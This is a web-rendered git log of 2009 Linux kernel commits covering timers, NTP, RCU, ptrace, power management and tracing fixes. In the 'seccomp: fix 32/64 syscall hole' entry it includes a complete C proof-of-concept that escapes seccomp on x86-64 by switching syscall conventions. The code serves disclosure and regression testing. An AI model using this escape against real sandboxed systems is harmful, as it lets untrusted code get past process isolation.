aboutsummaryrefslogtreecommitdiff
path: root/kernel
AgeCommit message (Collapse)Author
2009-04-08posix-timers: fix RLIMIT_CPU && setitimer(CPUCLOCK_PROF)Oleg Nesterov
update_rlimit_cpu() tries to optimize out set_process_cpu_timer() in case when we already have CPUCLOCK_PROF timer which should expire first. But it uses cputime_lt() instead of cputime_gt(). Test case: int main(void) { struct itimerval it = { .it_value = { .tv_sec = 1000 }, }; assert(!setitimer(ITIMER_PROF, &it, NULL)); struct rlimit rl = { .rlim_cur = 1, .rlim_max = 1, }; assert(!setrlimit(RLIMIT_CPU, &rl)); for (;;) ; return 0; } Without this patch, the task is not killed as RLIMIT_CPU demands. Signed-off-by: Oleg Nesterov <oleg@redhat.com> Acked-by: Peter Zijlstra <peterz@infradead.org> Cc: Peter Lojkin <ia6432@inbox.ru> Cc: Roland McGrath <roland@redhat.com> Cc: stable@kernel.org LKML-Reference: <20090327000610.GA10108@redhat.com> Signed-off-by: Ingo Molnar <mingo@elte.hu>
2009-04-08posix-timers: fix RLIMIT_CPU && fork()Oleg Nesterov
See http://bugzilla.kernel.org/show_bug.cgi?id=12911 copy_signal() copies signal->rlim, but RLIMIT_CPU is "lost". Because posix_cpu_timers_init_group() sets cputime_expires.prof_exp = 0 and thus fastpath_timer_check() returns false unless we have other expired cpu timers. Change copy_signal() to set cputime_expires.prof_exp if we have RLIMIT_CPU. Also, set cputimer.running = 1 in that case. This is not strictly necessary, but imho makes sense. Reported-by: Peter Lojkin <ia6432@inbox.ru> Signed-off-by: Oleg Nesterov <oleg@redhat.com> Acked-by: Peter Zijlstra <peterz@infradead.org> Cc: Peter Lojkin <ia6432@inbox.ru> Cc: Roland McGrath <roland@redhat.com> Cc: stable@kernel.org LKML-Reference: <20090327000607.GA10104@redhat.com> Signed-off-by: Ingo Molnar <mingo@elte.hu>
2009-04-02timers: add missing kernel-docRandy Dunlap
Add missing kernel-doc parameter notation and change function name to its new name: Warning(kernel/timer.c:543): No description found for parameter 'name' Warning(kernel/timer.c:543): No description found for parameter 'key' Signed-off-by: Randy Dunlap <randy.dunlap@oracle.com> Cc: akpm <akpm@linux-foundation.org> Cc: Johannes Berg <johannes@sipsolutions.net> LKML-Reference: <20090401174723.f0bea0eb.randy.dunlap@oracle.com> Signed-off-by: Ingo Molnar <mingo@elte.hu>
2009-03-26Merge branches 'timers/new-apis', 'timers/ntp' and 'timers/urgent' into ↵Ingo Molnar
timers/core
2009-03-26Merge commit 'v2.6.29' into timers/coreIngo Molnar
2009-03-23posix timers: fix RLIMIT_CPU && fork()Oleg Nesterov
See http://bugzilla.kernel.org/show_bug.cgi?id=12911 copy_signal() copies signal->rlim, but RLIMIT_CPU is "lost". Because posix_cpu_timers_init_group() sets cputime_expires.prof_exp = 0 and thus fastpath_timer_check() returns false unless we have other cpu timers. This is the minimal fix for 2.6.29 (tested) and 2.6.28. The patch is not optimal, we need further cleanups here. With this patch update_rlimit_cpu() is not really needed, but I don't think it should be removed. The proper fix (I think) is: - set_process_cpu_timer() should just start the cputimer->running logic (it does), no need to change cputime_expires.xxx_exp - posix_cpu_timers_init_group() should set ->running when needed - fastpath_timer_check() can check ->running instead of task_cputime_zero(signal->cputime_expires) Reported-by: Peter Lojkin <ia6432@inbox.ru> Signed-off-by: Oleg Nesterov <oleg@redhat.com> Cc: Peter Zijlstra <peterz@infradead.org> Cc: Roland McGrath <roland@redhat.com> Cc: <stable@kernel.org> [for 2.6.29.x] LKML-Reference: <20090323193411.GA17514@redhat.com> Signed-off-by: Ingo Molnar <mingo@elte.hu>
2009-03-23fix ptrace slownessMiklos Szeredi
This patch fixes bug #12208: Bug-Entry : http://bugzilla.kernel.org/show_bug.cgi?id=12208 Subject : uml is very slow on 2.6.28 host This turned out to be not a scheduler regression, but an already existing problem in ptrace being triggered by subtle scheduler changes. The problem is this: - task A is ptracing task B - task B stops on a trace event - task A is woken up and preempts task B - task A calls ptrace on task B, which does ptrace_check_attach() - this calls wait_task_inactive(), which sees that task B is still on the runq - task A goes to sleep for a jiffy - ... Since UML does lots of the above sequences, those jiffies quickly add up to make it slow as hell. This patch solves this by not rescheduling in read_unlock() after ptrace_stop() has woken up the tracer. Thanks to Oleg Nesterov and Ingo Molnar for the feedback. Signed-off-by: Miklos Szeredi <mszeredi@suse.cz> CC: stable@kernel.org Signed-off-by: Linus Torvalds <torvalds@linux-foundation.org>
2009-03-18module: fix refptr allocation and release orderMasami Hiramatsu
Impact: fix ref-after-free crash on failed module load Fix refptr bug: Change refptr allocation and release order not to access a module data structure pointed by 'mod' after freeing mod->module_core. This bug will cause kernel panic(e.g. failed to find undefined symbols). This bug was reported on systemtap bugzilla. http://sources.redhat.com/bugzilla/show_bug.cgi?id=9927 Signed-off-by: Masami Hiramatsu <mhiramat@redhat.com> Cc: Eric Dumazet <dada1@cosmosbay.com> Signed-off-by: Rusty Russell <rusty@rustcorp.com.au>
2009-03-10kernel/user.c: fix a memory leak when freeing up non-init usernamespaces usersDhaval Giani
We were returning early in the sysfs directory cleanup function if the user belonged to a non init usernamespace. Due to this a lot of the cleanup was not done and we were left with a leak. Fix the leak. Reported-by: Serge Hallyn <serue@linux.vnet.ibm.com> Signed-off-by: Dhaval Giani <dhaval@linux.vnet.ibm.com> Acked-by: Serge Hallyn <serue@us.ibm.com> Tested-by: Serge Hallyn <serue@us.ibm.com> Signed-off-by: Andrew Morton <akpm@linux-foundation.org> Signed-off-by: Linus Torvalds <torvalds@linux-foundation.org>
2009-03-09copy_process: fix CLONE_PARENT && parent_exec_id interactionOleg Nesterov
CLONE_PARENT can fool the ->self_exec_id/parent_exec_id logic. If we re-use the old parent, we must also re-use ->parent_exec_id to make sure exit_notify() sees the right ->xxx_exec_id's when the CLONE_PARENT'ed task exits. Also, move down the "p->parent_exec_id = p->self_exec_id" thing, to place two different cases together. Signed-off-by: Oleg Nesterov <oleg@redhat.com> Cc: Roland McGrath <roland@redhat.com> Cc: Andrew Morton <akpm@linux-foundation.org> Cc: David Howells <dhowells@redhat.com> Cc: Serge E. Hallyn <serge@hallyn.com> Signed-off-by: Linus Torvalds <torvalds@linux-foundation.org>
2009-03-09Fix fixpoint divide exception in acct_update_integralsHeiko Carstens
Frans Pop reported the crash below when running an s390 kernel under Hercules: Kernel BUG at 000738b4 verbose debug info unavailable! fixpoint divide exception: 0009 #1! SMP Modules linked in: nfs lockd nfs_acl sunrpc ctcm fsm tape_34xx cu3088 tape ccwgroup tape_class ext3 jbd mbcache dm_mirror dm_log dm_snapshot dm_mod dasd_eckd_mod dasd_mod CPU: 0 Not tainted 2.6.27.19 #13 Process awk (pid: 2069, task: 0f9ed9b8, ksp: 0f4f7d18) Krnl PSW : 070c1000 800738b4 (acct_update_integrals+0x4c/0x118) R:0 T:1 IO:1 EX:1 Key:0 M:1 W:0 P:0 AS:0 CC:1 PM:0 Krnl GPRS: 00000000 000007d0 7fffffff fffff830 00000000 ffffffff 00000002 0f9ed9b8 00000000 00008ca0 00000000 0f9ed9b8 0f9edda4 8007386e 0f4f7ec8 0f4f7e98 Krnl Code: 800738aa: a71807d0 lhi %r1,2000 800738ae: 8c200001 srdl %r2,1 800738b2: 1d21 dr %r2,%r1 >800738b4: 5810d10e l %r1,270(%r13) 800738b8: 1823 lr %r2,%r3 800738ba: 4130f060 la %r3,96(%r15) 800738be: 0de1 basr %r14,%r1 800738c0: 5800f060 l %r0,96(%r15) Call Trace: ( <000000000004fdea>! blocking_notifier_call_chain+0x1e/0x2c) <0000000000038502>! do_exit+0x106/0x7c0 <0000000000038c36>! do_group_exit+0x7a/0xb4 <0000000000038c8e>! SyS_exit_group+0x1e/0x30 <0000000000021c28>! sysc_do_restart+0x12/0x16 <0000000077e7e924>! 0x77e7e924 Reason for this is that cpu time accounting usually only happens from interrupt context, but acct_update_integrals gets also called from process context with interrupts enabled. So in acct_update_integrals we may end up with the following scenario: Between reading tsk->stime/tsk->utime and tsk->acct_timexpd an interrupt happens which updates accouting values. This causes acct_timexpd to be greater than the former stime + utime. The subsequent calculation of dtime = cputime_sub(time, tsk->acct_timexpd); will be negative and the division performed by cputime_to_jiffies(dtime) will generate an exception since the result won't fit into a 32 bit register. In order to fix this just always disable interrupts while accessing any of the accounting values. Reported by: Frans Pop <elendil@planet.nl> Tested by: Frans Pop <elendil@planet.nl> Cc: stable@kernel.org Cc: Martin Schwidefsky <schwidefsky@de.ibm.com> Signed-off-by: Heiko Carstens <heiko.carstens@de.ibm.com> Signed-off-by: Linus Torvalds <torvalds@linux-foundation.org>
2009-03-04rcu: increment quiescent state counter in ksoftirqd()Eric Dumazet
If a machine is flooded by network frames, a cpu can loop 100% of its time inside ksoftirqd() without calling schedule(). This can delay RCU grace period to insane values. Adding rcu_qsctr_inc() call in ksoftirqd() solves this problem. Paul: "This regression was a result of the recent change from "schedule()" to "cond_resched()", which got rid of that quiescent state in the common case where a reschedule is not needed". Signed-off-by: Eric Dumazet <dada1@cosmosbay.com> Reviewed-by: Paul E. McKenney <paulmck@linux.vnet.ibm.com> Signed-off-by: Andrew Morton <akpm@linux-foundation.org> Signed-off-by: Ingo Molnar <mingo@elte.hu>
2009-03-03Merge branch 'sched-fixes-for-linus' of ↵Linus Torvalds
git://git.kernel.org/pub/scm/linux/kernel/git/tip/linux-2.6-tip * 'sched-fixes-for-linus' of git://git.kernel.org/pub/scm/linux/kernel/git/tip/linux-2.6-tip: sched: don't allow setuid to succeed if the user does not have rt bandwidth sched_rt: don't start timer when rt bandwidth disabled
2009-03-03Merge branch 'core-fixes-for-linus' of ↵Linus Torvalds
git://git.kernel.org/pub/scm/linux/kernel/git/tip/linux-2.6-tip * 'core-fixes-for-linus' of git://git.kernel.org/pub/scm/linux/kernel/git/tip/linux-2.6-tip: rcu: Teach RCU that idle task is not quiscent state at boot
2009-03-02x86-64: seccomp: fix 32/64 syscall holeRoland McGrath
On x86-64, a 32-bit process (TIF_IA32) can switch to 64-bit mode with ljmp, and then use the "syscall" instruction to make a 64-bit system call. A 64-bit process make a 32-bit system call with int $0x80. In both these cases under CONFIG_SECCOMP=y, secure_computing() will use the wrong system call number table. The fix is simple: test TS_COMPAT instead of TIF_IA32. Here is an example exploit: /* test case for seccomp circumvention on x86-64 There are two failure modes: compile with -m64 or compile with -m32. The -m64 case is the worst one, because it does "chmod 777 ." (could be any chmod call). The -m32 case demonstrates it was able to do stat(), which can glean information but not harm anything directly. A buggy kernel will let the test do something, print, and exit 1; a fixed kernel will make it exit with SIGKILL before it does anything. */ #define _GNU_SOURCE #include <assert.h> #include <inttypes.h> #include <stdio.h> #include <linux/prctl.h> #include <sys/stat.h> #include <unistd.h> #include <asm/unistd.h> int main (int argc, char **argv) { char buf[100]; static const char dot[] = "."; long ret; unsigned st[24]; if (prctl (PR_SET_SECCOMP, 1, 0, 0, 0) != 0) perror ("prctl(PR_SET_SECCOMP) -- not compiled into kernel?"); #ifdef __x86_64__ assert ((uintptr_t) dot < (1UL << 32)); asm ("int $0x80 # %0 <- %1(%2 %3)" : "=a" (ret) : "0" (15), "b" (dot), "c" (0777)); ret = snprintf (buf, sizeof buf, "result %ld (check mode on .!)\n", ret); #elif defined __i386__ asm (".code32\n" "pushl %%cs\n" "pushl $2f\n" "ljmpl $0x33, $1f\n" ".code64\n" "1: syscall # %0 <- %1(%2 %3)\n" "lretl\n" ".code32\n" "2:" : "=a" (ret) : "0" (4), "D" (dot), "S" (&st)); if (ret == 0) ret = snprintf (buf, sizeof buf, "stat . -> st_uid=%u\n", st[7]); else ret = snprintf (buf, sizeof buf, "result %ld\n", ret); #else # error "not this one" #endif write (1, buf, ret); syscall (__NR_exit, 1); return 2; } Signed-off-by: Roland McGrath <roland@redhat.com> [ I don't know if anybody actually uses seccomp, but it's enabled in at least both Fedora and SuSE kernels, so maybe somebody is. - Linus ] Signed-off-by: Linus Torvalds <torvalds@linux-foundation.org>
2009-02-27Fix recursive lock in free_uid()/free_user_ns()David Howells
free_uid() and free_user_ns() are corecursive when CONFIG_USER_SCHED=n, but free_user_ns() is called from free_uid() by way of uid_hash_remove(), which requires uidhash_lock to be held. free_user_ns() then calls free_uid() to complete the destruction. Fix this by deferring the destruction of the user_namespace. Signed-off-by: David Howells <dhowells@redhat.com> Acked-by: Serge Hallyn <serue@us.ibm.com> Signed-off-by: Andrew Morton <akpm@linux-foundation.org> Signed-off-by: Linus Torvalds <torvalds@linux-foundation.org>
2009-02-27sched: don't allow setuid to succeed if the user does not have rt bandwidthDhaval Giani
Impact: fix hung task with certain (non-default) rt-limit settings Corey Hickey reported that on using setuid to change the uid of a rt process, the process would be unkillable and not be running. This is because there was no rt runtime for that user group. Add in a check to see if a user can attach an rt task to its task group. On failure, return EINVAL, which is also returned in CONFIG_CGROUP_SCHED. Reported-by: Corey Hickey <bugfood-ml@fatooh.org> Signed-off-by: Dhaval Giani <dhaval@linux.vnet.ibm.com> Acked-by: Peter Zijlstra <a.p.zijlstra@chello.nl> Signed-off-by: Ingo Molnar <mingo@elte.hu>
2009-02-26time: ntp: fix bug in ntp_update_offset() & do_adjtimex(), fixJohn Stultz
The time_status conditional was accidentally placed right after we clear the checked time_status bits, which causes us to take the conditional every time through. This fixes it by moving the conditional to before we clear the time_status bits. Signed-off-by: John Stultz <johnstul@us.ibm.com> Cc: Clark Williams <williams@redhat.com> Signed-off-by: Ingo Molnar <mingo@elte.hu>
2009-02-26sched_rt: don't start timer when rt bandwidth disabledHiroshi Shimamoto
Impact: fix incorrect condition check No need to start rt bandwidth timer when rt bandwidth is disabled. If this timer starts, it may stop at sched_rt_period_timer() on the first time. Signed-off-by: Hiroshi Shimamoto <h-shimamoto@ct.jp.nec.com> Acked-by: Peter Zijlstra <a.p.zijlstra@chello.nl> Signed-off-by: Ingo Molnar <mingo@elte.hu>
2009-02-26rcu: Teach RCU that idle task is not quiscent state at bootPaul E. McKenney
This patch fixes a bug located by Vegard Nossum with the aid of kmemcheck, updated based on review comments from Nick Piggin, Ingo Molnar, and Andrew Morton. And cleans up the variable-name and function-name language. ;-) The boot CPU runs in the context of its idle thread during boot-up. During this time, idle_cpu(0) will always return nonzero, which will fool Classic and Hierarchical RCU into deciding that a large chunk of the boot-up sequence is a big long quiescent state. This in turn causes RCU to prematurely end grace periods during this time. This patch changes the rcutree.c and rcuclassic.c rcu_check_callbacks() function to ignore the idle task as a quiescent state until the system has started up the scheduler in rest_init(), introducing a new non-API function rcu_idle_now_means_idle() to inform RCU of this transition. RCU maintains an internal rcu_idle_cpu_truthful variable to track this state, which is then used by rcu_check_callback() to determine if it should believe idle_cpu(). Because this patch has the effect of disallowing RCU grace periods during long stretches of the boot-up sequence, this patch also introduces Josh Triplett's UP-only optimization that makes synchronize_rcu() be a no-op if num_online_cpus() returns 1. This allows boot-time code that calls synchronize_rcu() to proceed normally. Note, however, that RCU callbacks registered by call_rcu() will likely queue up until later in the boot sequence. Although rcuclassic and rcutree can also use this same optimization after boot completes, rcupreempt must restrict its use of this optimization to the portion of the boot sequence before the scheduler starts up, given that an rcupreempt RCU read-side critical section may be preeempted. In addition, this patch takes Nick Piggin's suggestion to make the system_state global variable be __read_mostly. Changes since v4: o Changes the name of the introduced function and variable to be less emotional. ;-) Changes since v3: o WARN_ON(nr_context_switches() > 0) to verify that RCU switches out of boot-time mode before the first context switch, as suggested by Nick Piggin. Changes since v2: o Created rcu_blocking_is_gp() internal-to-RCU API that determines whether a call to synchronize_rcu() is itself a grace period. o The definition of rcu_blocking_is_gp() for rcuclassic and rcutree checks to see if but a single CPU is online. o The definition of rcu_blocking_is_gp() for rcupreempt checks to see both if but a single CPU is online and if the system is still in early boot. This allows rcupreempt to again work correctly if running on a single CPU after booting is complete. o Added check to rcupreempt's synchronize_sched() for there being but one online CPU. Tested all three variants both SMP and !SMP, booted fine, passed a short rcutorture test on both x86 and Power. Located-by: Vegard Nossum <vegard.nossum@gmail.com> Tested-by: Vegard Nossum <vegard.nossum@gmail.com> Tested-by: Paul E. McKenney <paulmck@linux.vnet.ibm.com> Signed-off-by: Paul E. McKenney <paulmck@linux.vnet.ibm.com> Signed-off-by: Ingo Molnar <mingo@elte.hu>
2009-02-25time: ntp: clean up second_overflow()Ingo Molnar
Impact: cleanup, no functionality changed The 'time_adj' local variable is named in a very confusing way because it almost shadows the 'time_adjust' global variable - which is used in this same function. Rename it to 'delta' - to make them stand apart more clearly. kernel/time/ntp.o: text data bss dec hex filename 2545 114 144 2803 af3 ntp.o.before 2545 114 144 2803 af3 ntp.o.after md5: 1bf0b3be564512279ba7cee299d1d2be ntp.o.before.asm 1bf0b3be564512279ba7cee299d1d2be ntp.o.after.asm Signed-off-by: Ingo Molnar <mingo@elte.hu>
2009-02-25time: ntp: simplify ntp_tick_adj calculationsIngo Molnar
Impact: micro-optimization Convert the (internal) ntp_tick_adj value we store from unscaled units to scaled units. This is a constant that we never modify, so scaling it up once during bootup is enough - we dont have to do it for every adjustment step. Signed-off-by: Ingo Molnar <mingo@elte.hu>
2009-02-25time: ntp: make 64-bit constants more robustIngo Molnar
Impact: cleanup, no functionality changed - make PPM_SCALE an explicit s64 constant, to remove (s64) casts from usage sites. kernel/time/ntp.o: text data bss dec hex filename 2536 114 136 2786 ae2 ntp.o.before 2536 114 136 2786 ae2 ntp.o.after md5: 40a7728d1188aa18e83e21a81fa7b150 ntp.o.before.asm 40a7728d1188aa18e83e21a81fa7b150 ntp.o.after.asm Signed-off-by: Ingo Molnar <mingo@elte.hu>
2009-02-25time: ntp: refactor do_adjtimex() some moreIngo Molnar
Impact: cleanup, no functionality changed Further simplify do_adjtimex(): - introduce the ntp_start_leap_timer() helper function - eliminate the goto adj_done complication Signed-off-by: Ingo Molnar <mingo@elte.hu>
2009-02-25time: ntp: refactor do_adjtimex()Ingo Molnar
Impact: cleanup, no functionality changed do_adjtimex() is currently a monster function with a maze of branches. Refactor the txc->modes setting aspects of it into two new helper functions: process_adj_status() process_adjtimex_modes() kernel/time/ntp.o: text data bss dec hex filename 2512 114 136 2762 aca ntp.o.before 2512 114 136 2762 aca ntp.o.after Signed-off-by: Ingo Molnar <mingo@elte.hu>
2009-02-25time: ntp: fix bug in ntp_update_offset() & do_adjtimex()Ingo Molnar
Impact: change (fix) the way the NTP PLL seconds offset is initialized/tracked Fix a bug and do a micro-optimization: When PLL is enabled we do not reset time_reftime. If the PLL was off for a long time (for example after bootup), this is arguably the wrong thing to do. We already had a hack for the common boot-time case in ntp_update_offset(), in form of: if (unlikely(time_status & STA_FREQHOLD || time_reftime == 0)) secs = 0; But the update delta should be reset later on too - not just when the PLL is enabled for the first time after bootup. So do it on !STA_PLL -> STA_PLL transitions. This changes behavior, as previously if ntpd was disabled for a long time and we restarted it, we'd run from that last update, with a very large delta. Signed-off-by: Ingo Molnar <mingo@elte.hu>
2009-02-25time: ntp: micro-optimize ntp_update_offset()Ingo Molnar
Impact: cleanup, no functionality changed The time_reftime update in ntp_update_offset() to xtime.tv_sec is a convoluted way of saying that we want to freeze the frequency and want the 'secs' delta to be 0. Also make this branch unlikely. This shaves off 8 bytes from the code size: text data bss dec hex filename 2504 114 136 2754 ac2 ntp.o.before 2496 114 136 2746 aba ntp.o.after Signed-off-by: Ingo Molnar <mingo@elte.hu>
2009-02-25time: ntp: simplify ntp_update_offset_fll()Ingo Molnar
Impact: cleanup, no functionality changed Change ntp_update_offset_fll() to delta logic instead of absolute value logic. This eliminates 'freq_adj' from the function. Signed-off-by: Ingo Molnar <mingo@elte.hu>
2009-02-25time: ntp: refactor and clean up ntp_update_offset()Ingo Molnar
Impact: cleanup, no functionality changed - introduce the ntp_update_offset_fll() helper - clean up the flow and variable naming kernel/time/ntp.o: text data bss dec hex filename 2504 114 136 2754 ac2 ntp.o.before 2504 114 136 2754 ac2 ntp.o.after md5: 01f7b8e1a5472a3056f9e4ae84d46315 ntp.o.before.asm 01f7b8e1a5472a3056f9e4ae84d46315 ntp.o.after.asm Signed-off-by: Ingo Molnar <mingo@elte.hu>
2009-02-25time: ntp: refactor up ntp_update_frequency()Ingo Molnar
Impact: cleanup, no functionality changed Change ntp_update_frequency() from a hard to follow code flow that uses global variables as temporaries, to a clean input+output flow. Signed-off-by: Ingo Molnar <mingo@elte.hu>
2009-02-25time: ntp: clean up ntp_update_frequency()Ingo Molnar
Impact: cleanup, no functionality changed Prepare a refactoring of ntp_update_frequency(). kernel/time/ntp.o: text data bss dec hex filename 2504 114 136 2754 ac2 ntp.o.before 2504 114 136 2754 ac2 ntp.o.after md5: 41f3009debc9b397d7394dd77d912f0a ntp.o.before.asm 41f3009debc9b397d7394dd77d912f0a ntp.o.after.asm Signed-off-by: Ingo Molnar <mingo@elte.hu>
2009-02-25time: ntp: simplify the MAX_TICKADJ_SCALED definitionIngo Molnar
Impact: cleanup, no functionality changed There's an ugly u64 typecase in the MAX_TICKADJ_SCALED definition, this can be eliminated by making the MAX_TICKADJ constant's type 64-bit (signed). kernel/time/ntp.o: text data bss dec hex filename 2504 114 136 2754 ac2 ntp.o.before 2504 114 136 2754 ac2 ntp.o.after md5: 41f3009debc9b397d7394dd77d912f0a ntp.o.before.asm 41f3009debc9b397d7394dd77d912f0a ntp.o.after.asm Signed-off-by: Ingo Molnar <mingo@elte.hu>
2009-02-25time: ntp: simplify the second_overflow() code flowIngo Molnar
Impact: cleanup, no functionality changed Instead of a hierarchy of conditions, transform them to clean gradual conditions and return's. This makes the flow easier to read and makes the purpose of the function easier to understand. kernel/time/ntp.o: text data bss dec hex filename 2552 170 168 2890 b4a ntp.o.before 2552 170 168 2890 b4a ntp.o.after md5: eae1275df0b7d6290c13f6f6f8f05c8c ntp.o.before.asm eae1275df0b7d6290c13f6f6f8f05c8c ntp.o.after.asm Signed-off-by: Ingo Molnar <mingo@elte.hu>
2009-02-25time: ntp: clean up kernel/time/ntp.cIngo Molnar
Impact: cleanup, no functionality changed Make this file a bit more readable by applying a consistent coding style. No code changed: kernel/time/ntp.o: text data bss dec hex filename 2552 170 168 2890 b4a ntp.o.before 2552 170 168 2890 b4a ntp.o.after md5: eae1275df0b7d6290c13f6f6f8f05c8c ntp.o.before.asm eae1275df0b7d6290c13f6f6f8f05c8c ntp.o.after.asm Signed-off-by: Ingo Molnar <mingo@elte.hu>
2009-02-22PM: Split up sysdev_[suspend|resume] from device_power_[down|up]Rafael J. Wysocki
Move the sysdev_suspend/resume from the callee to the callers, with no real change in semantics, so that we can rework the disabling of interrupts during suspend/hibernation. This is based on an earlier patch from Linus. Signed-off-by: Rafael J. Wysocki <rjw@sisk.pl> Signed-off-by: Linus Torvalds <torvalds@linux-foundation.org>
2009-02-21Merge branch 'hibernate'Linus Torvalds
* hibernate: PM: Fix suspend_console and resume_console to use only one semaphore PM: Wait for console in resume PM: Fix pm_notifiers during user mode hibernation swsusp: clean up shrink_all_zones() swsusp: dont fiddle with swappiness PM: fix build for CONFIG_PM unset PM/hibernate: fix "swap breaks after hibernation failures" PM/resume: wait for device probing to finish Consolidate driver_probe_done() loops into one place
2009-02-21PM: Fix suspend_console and resume_console to use only one semaphoreArve Hjønnevåg
This fixes a race where a thread acquires the console while the console is suspended, and the console is resumed before this thread releases it. In this case, the secondary console semaphore would be left locked, and the primary semaphore would be released twice. This in turn would cause the console switch on suspend or resume to hang forever. Note that suspend_console does not actually lock the console for clients that use acquire_console_sem, it only locks it for clients that use try_acquire_console_sem. If we change suspend_console to fully lock the console, then the kernel may deadlock on suspend. One client of try_acquire_console_sem is acquire_console_semaphore_for_printk, which uses it to prevent printk from using the console while it is suspended. Signed-off-by: Arve Hjønnevåg <arve@android.com> Signed-off-by: Rafael J. Wysocki <rjw@sisk.pl> Cc: Len Brown <lenb@kernel.org> Cc: Greg KH <gregkh@suse.de> Signed-off-by: Linus Torvalds <torvalds@linux-foundation.org>
2009-02-21PM: Wait for console in resumeArve Hjønnevåg
Avoids later waking up to a blinking cursor if the device woke up and returned to sleep before the console switch happened. Signed-off-by: Brian Swetland <swetland@google.com> Signed-off-by: Arve Hjønnevåg <arve@android.com> Signed-off-by: Rafael J. Wysocki <rjw@sisk.pl> Cc: Len Brown <lenb@kernel.org> Cc: Greg KH <gregkh@suse.de> Signed-off-by: Linus Torvalds <torvalds@linux-foundation.org>
2009-02-21PM: Fix pm_notifiers during user mode hibernationAndrey Borzenkov
Snapshot device is opened with O_RDONLY during suspend and O_WRONLY durig resume. Make sure we also call notifiers with correct parameter telling them what we are really doing. Signed-off-by: Andrey Borzenkov <arvidjaar@mail.ru> Signed-off-by: Rafael J. Wysocki <rjw@sisk.pl> Cc: Len Brown <lenb@kernel.org> Cc: Greg KH <gregkh@suse.de> Acked-by: Pavel Machek <pavel@ucw.cz> Signed-off-by: Linus Torvalds <torvalds@linux-foundation.org>
2009-02-21PM: fix build for CONFIG_PM unsetRafael J. Wysocki
Compilation of kprobes.c with CONFIG_PM unset is broken due to some broken config dependncies. Fix that. Signed-off-by: Rafael J. Wysocki <rjw@sisk.pl> Cc: Len Brown <lenb@kernel.org> Cc: Greg KH <gregkh@suse.de> Reported-by: Ingo Molnar <mingo@elte.hu> Tested-by: Masami Hiramatsu <mhiramat@redhat.com> Signed-off-by: Linus Torvalds <torvalds@linux-foundation.org>
2009-02-21PM/resume: wait for device probing to finishArjan van de Ven
the resume code does not currently wait for device probing to finish. Even without async function calls this is dicey and not correct, but with async function calls during the boot sequence this is going to get hit more... This patch adds the synchronization using the newly introduced helper. Signed-off-by: Arjan van de Ven <arjan@linux.intel.com> Signed-off-by: Rafael J. Wysocki <rjw@sisk.pl> Cc: Len Brown <lenb@kernel.org> Acked-by: Greg KH <gregkh@suse.de> Signed-off-by: Linus Torvalds <torvalds@linux-foundation.org>
2009-02-19Merge branch 'tracing-fixes-for-linus' of ↵Linus Torvalds
git://git.kernel.org/pub/scm/linux/kernel/git/tip/linux-2.6-tip * 'tracing-fixes-for-linus' of git://git.kernel.org/pub/scm/linux/kernel/git/tip/linux-2.6-tip: tracing: limit the number of loops the ring buffer self test can make tracing: have function trace select kallsyms tracing: disable tracing while testing ring buffer tracing/function-graph-tracer: trace the idle tasks
2009-02-19time: apply NTP frequency/tick changes immediatelyjohn stultz
Since the GENERIC_TIME changes landed, the adjtimex behavior changed for struct timex.tick and .freq changed. When the tick or freq value is set, we adjust the tick_length_base in ntp_update_frequency(). However, this new value doesn't get applied to tick_length until the next second (via second_overflow). This means some applications that do quick time tweaking do not see the requested change made as quickly as expected. I've run a few tests with this change, and ntpd still functions fine. Signed-off-by: John Stultz <johnstul@us.ibm.com> Signed-off-by: Ingo Molnar <mingo@elte.hu>
2009-02-18tracing: limit the number of loops the ring buffer self test can makeSteven Rostedt
Impact: prevent deadlock if ring buffer gets corrupted This patch adds a paranoid check to make sure the ring buffer consumer does not go into an infinite loop. Since the ring buffer has been set to read only, the consumer should not loop for more than the ring buffer size. A check is added to make sure the consumer does not loop more than the ring buffer size. Signed-off-by: Steven Rostedt <srostedt@redhat.com>
2009-02-18tracing: have function trace select kallsymsSteven Rostedt
Impact: fix output of function tracer to be useful The function tracer is pretty useless if KALLSYMS is not configured. Unless you are good at reading hex values, the function tracer should select the KALLSYMS configuration. Also, the dynamic function tracer will fail its self test if KALLSYMS is not selected. Signed-off-by: Steven Rostedt <srostedt@redhat.com>
2009-02-18tracing: disable tracing while testing ring bufferSteven Rostedt
Impact: fix to prevent hard lockup on self tests If one of the tracers are broken and is constantly filling the ring buffer while the test of the ring buffer is running, it will hang the box. The reason is that the test is a consumer that will not stop till the ring buffer is empty. But if the tracer is broken and is constantly producing input to the buffer, this test will never end. The result is a lockup of the box. This happened when KALLSYMS was not defined and the dynamic ftrace test constantly filled the ring buffer, because the filter failed and all functions were being traced. Something was being called that constantly filled the buffer. Signed-off-by: Steven Rostedt <srostedt@redhat.com>
2009-02-18Merge branch 'for-linus' of git://git.kernel.dk/linux-2.6-blockLinus Torvalds
* 'for-linus' of git://git.kernel.dk/linux-2.6-block: block: fix deadlock in blk_abort_queue() for drivers that readd to timeout list block: fix booting from partitioned md array block: revert part of 18ce3751ccd488c78d3827e9f6bf54e6322676fb cciss: PCI power management reset for kexec paride/pg.c: xs(): &&/|| confusion fs/bio: bio_alloc_bioset: pass right object ptr to mempool_free block: fix bad definition of BIO_RW_SYNC bsg: Fix sense buffer bug in SG_IO
2009-02-18pm: fix build for CONFIG_PM unsetRafael J. Wysocki
Compilation of kprobes.c with CONFIG_PM unset is broken due to some broken config dependncies. Fix that. Signed-off-by: Rafael J. Wysocki <rjw@sisk.pl> Reported-by: Ingo Molnar <mingo@elte.hu> Tested-by: Masami Hiramatsu <mhiramat@redhat.com> Cc: Len Brown <lenb@kernel.org> Acked-by: Pavel Machek <pavel@suse.cz> Signed-off-by: Andrew Morton <akpm@linux-foundation.org> Signed-off-by: Linus Torvalds <torvalds@linux-foundation.org>
2009-02-18cgroups: fix possible use after freeLi Zefan
In cgroup_kill_sb(), root is freed before sb is detached from the list, so another sget() may find this sb and call cgroup_test_super(), which will access the root that has been freed. Reported-by: Al Viro <viro@ZenIV.linux.org.uk> Signed-off-by: Li Zefan <lizf@cn.fujitsu.com> Acked-by: Paul Menage <menage@google.com> Signed-off-by: Andrew Morton <akpm@linux-foundation.org> Signed-off-by: Linus Torvalds <torvalds@linux-foundation.org>
2009-02-18timers: add mod_timer_pending()Ingo Molnar
